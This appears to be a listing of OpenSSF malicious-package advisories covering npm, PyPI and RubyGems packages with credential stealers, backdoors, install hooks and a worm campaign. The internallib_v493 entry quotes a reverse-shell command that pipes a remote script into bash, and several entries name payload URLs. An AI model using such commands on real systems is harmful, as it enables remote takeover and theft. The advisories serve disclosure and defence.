
OSSF Malicious Packages
added 2026/05/25 3:26 p.m.

Malicious code in jsontoken-extend (npm)

Source: amazon-inspector 59a8a8ab722d33bdd2ea25422aaf7e607a1b1a881446c3561ec8225fb9187742 On require/import of jsontoken-extend, sign.js executes a top-level IIFE that base64-decodes a hardcoded string to https://www.jsonkeeper.com/b/XAMRK...

AI score: 6.5
Exploits: 0, References: 3
OSSF Malicious Packages
added 2026/05/24 6:23 p.m.

Malicious code in polymarket-data-fetcher (PyPI)

Source: kam193 b6b5ac8b803d36ef490adff8a4d3110c4030063bbd2345e4b23d1871909638e9 The code attempts to monitor the clipboard and replace copied cryptocurrency addresses, as well as establish persistence. --- Category: MALICIOUS - The campaig...

AI score: 5.9
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/24 4:04 p.m.

Malicious code in class-blend (npm)

Source: amazon-inspector d3876854a76bda6892f76b9b44c67e066bfc6315a7e3d27431137727ff0ee728 The package advertises itself as a clsx/twMerge-style class-name merging utility, but the exported applyGlobalStylespalette, accents function contain...

AI score: 5.9
Exploits: 0, References: 4
OSSF Malicious Packages
added 2026/05/23 7:14 p.m.

Malicious code in fastapi (PyPI)

Source: amazon-inspector a753fd569a7bb908b7cdf82fe0228dc0e24dcc253b67993af5dd5c30b61f4411 This release of fastapi 0.136.3 modifies pyproject.toml and PKG-INFO to add an undocumented dependency 'fastar=0.9.0' to the...

AI score: 6.2
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/22 1:24 a.m.

Malicious code in internallib_v493 (npm)

Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...

AI score: 5.8
Exploits: 0, References: 3
OSSF Malicious Packages
added 2026/05/21 7:14 a.m.

Malicious code in @toni77777/aora (npm)

Source: amazon-inspector 8566221a9ab9a1cb01b0f23e2af4b140d2e97310701b8c9a8f4bed1481fb22b2 On npm install, scripts/postinstall.js fetches a platform-specific executable from https://github.com/yourusername/aora/releases/download/v0.1.0/,...

AI score: 6.0
Exploits: 0, References: 2
OSSF Malicious Packages
added 2026/05/20 7:35 p.m.

Malicious code in @elvatis_com/openclaw-cli-bridge-elvatis (npm)

Source: amazon-inspector 8ea4d389a7d7fc1ab1598f69441105d1ebe696d9d5d351f805644bded733fe7e When the OpenClaw gateway loads this plugin and starts its proxy server, code paths in dist/index.js lines 1076 and 1093 schedule outbound WhatsApp...

AI score: 5.9
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/19 10:35 a.m.

Malicious code in paysafe-gbp-virtual-terminal-lib-fe (npm)

Source: amazon-inspector 8437cc0ad1a14bf5694e8b5fbc17a0616033c1c473c6e71f46684172bc122ab3 The package paysafe-gbp-virtual-terminal-lib-fe was found to contain malicious code. Source: ossf-package-analysis...

AI score: 5.8
Exploits: 0
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/f2-context (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/g-plugin-rough-canvas-renderer (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/l7plot (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/x6-plugin-snapline (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/x6-react-shape (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/x6-vue-shape (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @antv/x6-vue3-shape (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/19 12:00 a.m.

Malicious code in @lint-md/parser (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/17 3:19 p.m.

Malicious code in claude-code-base-action (npm)

Source: amazon-inspector 3000eab5b77e9247ae3dc1125384eaeb03ecdae7ecd17fe30ee6216a6a87c686 The package claude-code-base-action was found to contain malicious code. Source: ossf-package-analysis...

AI score: 5.8
Exploits: 0
OSSF Malicious Packages
added 2026/05/15 12:29 p.m.

Malicious code in venv-utils (PyPI)

Source: kam193 9af11c23295a9a592b6fd62d62490669a752ab6dc6c0b755ebd068ec6371375f Package contains code to silently execute a RAT-like agent, allowing the attacker to access the file system and execute arbitrary code. --- Category: MALICIOUS...

AI score: 6.2
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/14 7:25 p.m.

Malicious code in rimraf-utils (npm)

Source: amazon-inspector a59d88d733415216903578b3c3806d76405a23a7cca56ee355eb6725e4e930d4 [email protected] impersonates the widely-installed rimraf package index.js is a dummy stub that internally identifies itself as 'lodash-js — Just a...

AI score: 5.8
Exploits: 0, References: 3
OSSF Malicious Packages
added 2026/05/13 4:32 p.m.

Malicious code in workingitmehelpit (PyPI)

Source: kam193 3e553fe0eea72dc43eab2696330acd6fbb3e4de8c95529eab6298411620c0c9f Package installs malware identified as a backdoor or reverse shell. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers...

AI score: 6.0
Exploits: 0, References: 3
OSSF Malicious Packages
added 2026/05/12 9:23 p.m.

Malicious code in @gusmano/reext (npm)

Source: amazon-inspector 498a21b60dcdfe236ea0b1683e1ec64aa091643b6ad562c3845757eed79660d8 The npm preinstall lifecycle script dist/scripts/preinstall.js, wired via package.json "preinstall": "node./dist/scripts/preinstall.js" reads the...

AI score: 5.9
Exploits: 0, References: 34
OSSF Malicious Packages
added 2026/05/12 5:49 a.m.

Malicious code in mistralai (PyPI)

Source: google-open-source-security 5e1924464368f0c5816ee84e000cc47017f44045140feafbbc9e685d847ed5a5 This package was compromised as part of the "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/12 5:49 a.m.

Malicious code in @ml-toolkit-ts/xgboost (npm)

Source: google-open-source-security 5e1924464368f0c5816ee84e000cc47017f44045140feafbbc9e685d847ed5a5 This package was compromised as part of the "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials...

AI score: 5.8
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/05/08 7:20 a.m.

Malicious code in eth-web3-utils (PyPI)

Source: kam193 ab01b68589d4f3b1e8686ed007d522f24c8259049cb211a023ac3f3ff8f56ce4 Code pretends to be an ETH utility and exfiltrates the given seed/private key --- Category: MALICIOUS - The campaign has clearly malicious intent, like...

AI score: 5.8
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/04 8:53 p.m.

Malicious code in rogiant (PyPI)

Source: kam193 c7f7e1dc50782abed477c5013c8a732e952d747ffa770f399571ff468699b8f3 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...

AI score: 6.0
Exploits: 0, References: 9
OSSF Malicious Packages
added 2026/05/02 3:40 a.m.

Malicious code in currenttimerpy (PyPI)

Source: kam193 ccd5c81889e68b6ae8a0e8ef90b7c3a4dc447b08872ad6ac48ce94804985379d During import, the package automatically downloads and executes code that first acts as an infostealer and then starts code acting as a RAT. It connects with a...

AI score: 6.0
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/04/29 3:33 p.m.

Malicious code in bbranger (PyPI)

Source: kam193 9cb5c90bcde5bf7b63607d4bf5e7be1ccb7b5c9eb2eb92e32dab102be5df3687 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

AI score: 5.5
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/04/23 7:27 a.m.

Malicious code in eth-logger (npm)

Source: amazon-inspector 843cae77c9aaf84bef1b7d5e46e27795d5203d2959a39b2797f0e1248b4995c7 The package eth-logger was found to contain malicious code. Source: ossf-package-analysis...

AI score: 5.8
Exploits: 0
OSSF Malicious Packages
added 2026/03/27 3:07 a.m.

Malicious code in test1sharp (npm)

Source: amazon-inspector 870c745216e287e72f189910e8bd7369f6d6aedbabf85077bfe170b2d1e1de12 The package test1sharp was found to contain malicious code. Source: ghsa-malware c18dd124c0c097c8c6e277f7fd86c791a6d988ecb5545f5811c669e6c1269a95 Any...

AI score: 5.8
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/03/03 5:51 p.m.

Malicious code in urllib-slim (PyPI)

Source: kam193 acbcedbcc1d5bafffbb66128eae99b1fdc6c8e62b65bedd8f62ee2790919d972 During installation, the package starts obfuscated code that downloads and runs remote executables in specific environments. In some packages in the campaign,...

AI score: 5.9
Exploits: 0, References: 5
OSSF Malicious Packages
added 2026/02/04 10:24 a.m.

Malicious code in tablescene (PyPI)

Source: kam193 75f24eaea6c977e93d35c431f9bedc66b7757fd5c5635425c28801dad3b50de9 Packages contain hidden code that is effectively run during importing or using the library, and downloads second stage code. Then, a process running in...

AI score: 5.8
Exploits: 0, References: 3
OSSF Malicious Packages
added 2026/02/03 5:01 a.m.

Malicious code in freedom-baileys (npm)

Source: amazon-inspector 4512163cbee4473b3f1fec8504df8a156ada7ac4ca90a763fb9968ba58178ade The package freedom-baileys was found to contain malicious code. Source: ghsa-malware 7c21d9105c9c9c7f67546b69fd620327c3b304280b1113d557601d49a0639cd...

AI score: 5.4
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/01/12 3:12 a.m.

Malicious code in @maxcointech/simple-string-utils (npm)

Source: amazon-inspector 3ce5c423557091383b99bcc8612d954b43dd380d8979019493ee390f7bfa5a30 The package @maxcointech/simple-string-utils was found to contain malicious code. Source: ghsa-malware...

AI score: 6.9
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/01/12 1:59 a.m.

Malicious code in xml2js-js (npm)

Source: amazon-inspector c18f9df8257f4f610dbfd70460757eb36539314c7cce4d9eda82758da6984725 The package xml2js-js was found to contain malicious code. Source: ghsa-malware cf7cd10255ee6ff91469e7f180436d90c3eca29de3dc0b3f883c13403ca30132 Any...

AI score: 6.9
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/01/09 3:04 a.m.

Malicious code in n8n-nodes-hfgjf-irtuinvcm-lasdqewriit (npm)

Source: amazon-inspector f4dabf38b16acea59219df3a3f57a396f3ebe958985096579cd43c419609b764 The package n8n-nodes-hfgjf-irtuinvcm-lasdqewriit was found to contain malicious code. Source: ghsa-malware...

AI score: 6.9
Exploits: 0, References: 1
OSSF Malicious Packages
added 2025/11/22 10:03 a.m.

Malicious code in airbnb-react-router-legacy-v3 (npm)

Source: amazon-inspector 64d31fa6c9b6cd0a9e87216ce93110698b49f1fede30d3f090902284a5153613 The package airbnb-react-router-legacy-v3 was found to contain malicious code. Source: ossf-package-analysis...

AI score: 6.9
Exploits: 0
OSSF Malicious Packages
added 2025/09/01 9:52 a.m.

Malicious code in monolith-twirp-features-actors (RubyGems)

Source: ossf-package-analysis af5da19cc088c1f8c8715fafba484c4ae7ab890004b1f92947ee212b28b0abe1 The OpenSSF Package Analysis project identified 'monolith-twirp-features-actors' @ 1.0.4 rubygems as malicious. It is considered malicious...

AI score: 7.2
Exploits: 0
OSSF Malicious Packages
added 2025/09/01 9:52 a.m.

Malicious code in monolith-twirp-features-groups (RubyGems)

Source: ossf-package-analysis f84ce8437ca7734a032fd542e9296762ced4f17846d9f74980c144260a948d9e The OpenSSF Package Analysis project identified 'monolith-twirp-features-groups' @ 1.0.0 rubygems as malicious. It is considered malicious...

AI score: 7.2
Exploits: 0
OSSF Malicious Packages
added 2024/11/03 4:58 p.m.

Malicious code in appdynamics-libagent-napi (npm)

Source: ghsa-malware b3ccb8490c24108245e9e5e4893518e881e48f0dafa4b0ad152ab458de4e7b1b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

AI score: 6.8
Exploits: 0, References: 1
OSSF Malicious Packages
added 2 days ago

Malicious code in npm-sandbox-ping-c8f2a (npm)

Source: amazon-inspector f5401a81d56283c310efebfe29af19c3e3fa331667f40adeed71a54627adc877 Package declares a postinstall hook "postinstall": "node run.js" in package.json that executes on every install. Bundled scripts beacon6.js and...

AI score: 5.4
Exploits: 0, References: 1
OSSF Malicious Packages
added 2 days ago

Malicious code in npm-sandbox-research-8b2f (npm)

Source: amazon-inspector 916280d3906e0f04caa7f46135039e4a42b03a5c96091c1555ad2ab0e86b923b On install, package.json runs postinstall: node run.js, which loads beacon scripts beacon8.js, beaconlinux.js that import childprocess, os, and http,...

AI score: 5.4
Exploits: 0, References: 1
OSSF Malicious Packages
added 2 days ago

Malicious code in npm-sandbox-research-d7e8 (npm)

Source: amazon-inspector 3ff31cbf7e2e36cef422933472638912cd6ee6652ece9b03d11faa98b70d13e9 Package declares a postinstall lifecycle hook "postinstall": "node run.js" that auto-executes on install. The package ships beacon scripts beacon12.j...

AI score: 5.3
Exploits: 0, References: 1
OSSF Malicious Packages
added 3 days ago

Malicious code in salesforce-sysutils-diagnostics (PyPI)

Source: amazon-inspector 59e4ce1338f2439a1a5b2d257b96aadaef4a9c2883f6787343856728514bd148 setup.py unconditionally invokes curl at install time to POST the contents of /tmp/fake-keys.json to...

AI score: 5.6
Exploits: 0, References: 2
OSSF Malicious Packages
added 3 days ago

Malicious code in oh-my-ashclaw (npm)

Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...

AI score: 5.5
Exploits: 0, References: 1
OSSF Malicious Packages
added 3 days ago

Malicious code in environment-gate (npm)

Source: amazon-inspector 48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1 The package's only export, gate, performs an HTTP GET to a base64-obfuscated URL https://www.jsonkeeper.com/b/VKUNI and passes the response body...

AI score: 6.0
Exploits: 0, References: 1
OSSF Malicious Packages
added 5 days ago

Malicious code in janus-flow (npm)

Source: amazon-inspector 2d33c10c068a69d14d0333b93de7745caffd62013c57de6c55f20a6b53ffdcb1 On npm install, the package's postinstall hook node postinstall.js 2/dev/null || true silently runs a credential harvester against the installer...

AI score: 5.4
Exploits: 0, References: 2
OSSF Malicious Packages
added 2026/06/07 4:59 p.m.

Malicious code in consumerweb-authflow (npm)

Source: amazon-inspector acbd81f78a40f87b410799545f06c929bc7e7c3f552eeea06254416b3b9e0977 On npm install, the package's postinstall.js collects host identifiers via os.hostname, os.userInfo.username, os.platform, and the current working...

AI score: 5.4
Exploits: 0, References: 2
OSSF Malicious Packages
added 2026/06/07 10:25 a.m.

Malicious code in sequoia-engineering (npm)

Source: ossf-package-analysis 2f9c2bfd3d6035b7f58ea95bdcd1329af80adec3c1ef84cb1a8412c6d4c3bf9b The OpenSSF Package Analysis project identified 'sequoia-engineering' @ 2.2.2 npm as malicious. It is considered malicious because: - The packag...

AI score: 5.4
Exploits: 0
OSSF Malicious Packages
added 2026/06/06 7:29 p.m.

Malicious code in encrypted-archive (npm)

Source: amazon-inspector c60d89261c09dc6eaea0a3af26af55519421cb927a1b8183009d09b2d4e99b94 On npm install, the package executes a preinstall hook package.json "preinstall": "node index.js || true" that runs index.js, which performs a DNS...

AI score: 5.4
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.

Malicious code in napari-ufish (PyPI)

Source: kam193 5103d2b75fe554764a66f5e03957c303d4085a7d5133463f58aa0c83a87f5d7d Versions 0.0.2, 0.0.3 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed...

AI score: 5.5
Exploits: 0, References: 6